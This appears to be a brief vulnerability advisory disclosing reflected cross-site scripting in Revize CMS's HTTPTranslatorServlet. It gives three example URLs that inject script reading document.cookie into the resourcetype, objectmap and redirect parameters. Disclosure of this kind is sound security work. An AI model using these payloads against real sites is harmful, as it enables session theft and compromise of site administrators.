Revize CMS HTTPTranslatorServlet Cross-Site Scripting Vulnerability

No exploit is required.

Example URI have been provided:

http://www.example.com/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp
http://www.example.com/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp
http://www.example.com/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp


 

Privacy Statement
Copyright 2010, SecurityFocus